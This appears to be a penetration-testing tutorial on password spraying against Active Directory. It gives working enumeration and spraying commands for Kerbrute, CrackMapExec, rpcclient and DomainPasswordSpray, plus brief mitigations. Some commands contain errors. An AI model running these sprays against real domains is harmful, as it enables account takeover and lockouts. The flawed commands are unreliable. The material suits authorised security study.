Password Spraying - AD
This section will cover Password Spraying attacks in Active Directory.
Table of Contents
- Overview
- Enumeration
- CrackMapExec
- Kerbrute
- net and PowerView
- SMB NULL Sessions
- rpcclient
- enum4linux-ng
- LDAP Anonymous Bind
- ldapsearch
- windapsearch
- Exploitation
- Kerbrute
- CrackMapExec
- rpcclient
- DomainPasswordSpray
- Mitigations
Overview
Password Spraying is an attack where an attacker tries multiple usernames against the same password.
In Active Directory, this can lead to a potential account lockout due to too many attempts against the targeted accounts leading to Denial of Service (DoS). Successful attempts can also compromise the security of the system and domain.
Enumeration
We can enumerate the password policy and usernames of the AD environment using tools such as CrackMapExec or Kerbrute.
CrackMapExec
To use CrackMapExec, we can use the following command. We will require valid domain credentials to perform this.
crackmapexec smb <Target IP> -u <username> -p <password> --pass-pol
Command breakdown:
smb- Specify to use the SMB protocol.<Target IP>- Specify the target IP address.-u <username>- Specify the username to use for authentication.-p <password>- Specify the password to use for authentication.--pass-pol- Specify to enumerate the password policy.
To enumerate for usernames, we can use the following command.
crackmapexec smb <Target IP> --users
crackmapexec smb <Target IP> -u <username> -p "<password>" --users
Command breakdown:
smb- Specify to use the SMB protocol.<Target IP>- Specify the target IP address.-u <username>- Specify the username to use for authentication.-p "<password>"- Specify the password to use for authentication.--users- Specify to enumerate for usernames.
Kerbrute
We can use Kerbrute to enumerate valid AD accounts using the following command.
kerbrute userenum -d <domain> --dc <Domain Controller IP> /path/to/users/wordlist
Command breakdown:
userenum- Specify to perform user enumeration.-d <domain>- Specify the target domain.--dc <Domain Controller IP>- Specify the domain controller IP address./path/to/users/wordlist- Specify the username wordlist to use for enumeration.
net and PowerView
On Windows, we can use tools such as the built-in net command or PowerView to enumerate for the password policy. We will require valid domain credentials to perform this.
net accounts
We can also use PowerView to enumerate the password policy.
Import-Module .\PowerView.ps1
Get-DomainPolicy
SMB NULL Sessions
We can also obtain the password policy from Linux and Windows via SMB NULL sessions.
SMB NULL sessions allow an unauthenticated attacker to retrieve information from the domain, such as users, groups, computers, password policies, etc. This is often the result of legacy Domain Controllers being upgraded in place which brings along any security misconfigurations from the older version of Windows Server.
The following will be covered:
- rpcclient
- enum4linux-ng
rpcclient
To use rpcclient, we can use the following command.
rpcc -U "" -N <Target IP>
Once connected, we can use the querydominfo to query information about the domain. We can also use the enumdomusers query to enumerate for usernames.
enum4linux-ng
enum4linux-ng is written in Python and allows us to output the results into formats such as YAML or JSON which can be processed using other tools.
We can use the following command enumerate the password policy.
enum4linux-ng -P <Target IP> -oA <file name>
Command breakdown:
-P- Extract password policy<target IP>- Specify the target IP address.-oA <file name>- Specify the file name to save the results as.
We can also use the following command to enumerate for users.
enum4linux -U <Target IP> | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"
Command breakdown:
-U- Specify to enumerate for users.<Target IP>- Specify the target IP address.| grep- Pipe the output to Grep."user:"- Search for the stringuser:.| cut -f2 -d"["- Pipe the output tocutand select the second field with the[delimiter.| cut -f2 -d"]"- Pipe the output tocutand select the first field with the]delimiter.
LDAP Anonymous Bind
LDAP anonymous binds allows an unauthenticated attacker to retrieve information from the domain such as listings of users, groups, computers, password policies, and more. This is a legacy configuration, and as of Windows Server 2003, only authenticated users are permitted to initiate LDAP requests.
ldapsearch
With an LDAP anonymous bind, we can use LDAP-specific enumeration tools to pull the password policy.
To enumerate the password policy, we can use the following command.
ldapsearch -h <Target IP> -x -b"DC=<Domain name>,DC=<TLD> -s sub "*" | grep -m -B 10 pwdHistoryLength
Command breakdown:
-h <Target IP>- Specify the hostname of the LDAP server.-x- Use simple authentication instead of SASL.-b "DC=<Domain name>,DC=LOCAL- Specify the second level and top level domain.-s sub- Search scope is sub. This means to search the base DN and all its descendants."*"- Retrieve all attributes for entries that match the filter.| grep- Pipe the output into grep.-m 1- Stop on the first match.-B 10- Include the 10 lines before the match in the output.pwdHistoryLength- Specify what to search.
To enumerate for users, we can use the following command.
ldapsearch -h <Target IP> -x -b "DC=<second level domain>,DC=<top level domain>" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "
Command breakdown:
-h <Target IP>- Specify the target IP address.-x- Use simple authentication instead of SASL.-b "DC=<second level domain>,DC=<top level domain>"- Specify the second level and top level domain.-s sub- Search scope is sub. This means to search the base DN and all its descendants."(&(objectclass=user))"- Specify to look for the object class "user" within the domain.| grep sAMAccountName:- Pipe the output to Grep and only include results withsAMAccountName:.| cut -f2 -d" "- Pipe the output tocut, split it by spaces and select the second field.
windapsearch
We can use a tool called windapsearch to enumerate for usernames.
python3 windapsearch.py --dc-ip <Domain Controller IP> -u "" -U
Command breakdown:
--dc-ip <Domain Controller IP>- Specify the domain controller IP Address.-u ""- Specify the username to use. In this case, a blank username.-U- Specify to enumerate for users.
Exploitation
There are several tools that can be used to perform password spraying.
The following will be covered:
- Kerbrute
- CrackMapExec
- rpcclient
- DomainPasswordSpray
Kerbrute
We can use the following command to perform password spraying.
kerbrute passwordspray -d <domain> --dc <Domain Controller IP> <username wordlist> <password>
Command breakdown:
passwordspray- Specify to perform password spraying.-d <domain>- Specify the target domain.--dc <Domain Controller IP>- Specify the domain controller IP address.<username wordlist>- Specify the list of usernames to use.<password>- Specify the password to use.
An example:
kerbrute passwordspray -d mycorp.lan --dc 10.42.0.22 valid_users.txt MyPassword1
CrackMapExec
We can use the following commands to perform password spraying and filtering out the logon failures.
crackmapexec smb <Target IP> -u <username wordlist> -p <password> | grep +
Command breakdown:
smb- Specify the protocol to use.<Target IP>- Specify the target IP address.-u <username wordlist>- Specify the list of valid usernames to use.-p <password>- Specify the password to use.| grep +- Pipe the output togrepand only show results with+.
Once we have obtained valid credentials, we can verify them using the following command.
crackmapexec smb <Target IP> -u <username> -p <password>
If we obtain credentials to an local administrator account, we can attempt to check if the passwords can be reused on other machines.
crackmapexec smb <Network IP>/<CIDR> -u administrator -p <password> --local-auth | grep +
Command breakdown:
smb- Specify the protocol to use.<Network IP>/<CIDR>- Specify the network address and CIDR notation.-u administrator- Specify the username to use for authentication. Administrator in this example.-p <password>- Specify the password to use for authentication.--local-auth- Specify to login as a local account.| grep +- Pipe the output togrepand only display results with+.
rpcclient
We can also use the following bash one-liner to perform password spraying.
for u in $(cat <username wordlist>);do rpcclient -U "$u%<password>" -c "getusername;quit" <Target IP> | grep Authority; done
The above command will use the a list of valid usernames specified at <username wordlist> with the provided password at <password> and pipe the output to grep to filter all responses with Authority Name which indicates a successful login.
DomainPasswordSpray
If we are attacking from a Windows machine, we can use a PowerShell script called DomainPasswordSpray.ps1. It can be downloaded from GitHub.
https://github.com/dafthack/DomainPasswordSpray
Once downloaded, we can use the following command to import our module.
Import-Module .\DomainPasswordSpray.ps1
We can use the following command to perform password spraying.
Invoke-DomainPasswordSpray -Password <password> -OutFile <file name> -ErrorAction SilentlyContinue
Command breakdown:
-Password <password>- Specify the password to use.-OutFile <file name>- Specify the output file to save results to.-ErrorAction SilentlyContinue- Specify to continue on errors.
Mitigations
To mitigate password spraying attacks, it is recommended to use multi-factor authentication.
It is also recommended to enforce the principle of least privilege to limit what an compromised account can do within the system and domain.
It is also recommended to have a strong password policy with password hygiene. Such examples are restricting the use of dictionary words, common words, and variations of common phrases such as the company name within the password.
References: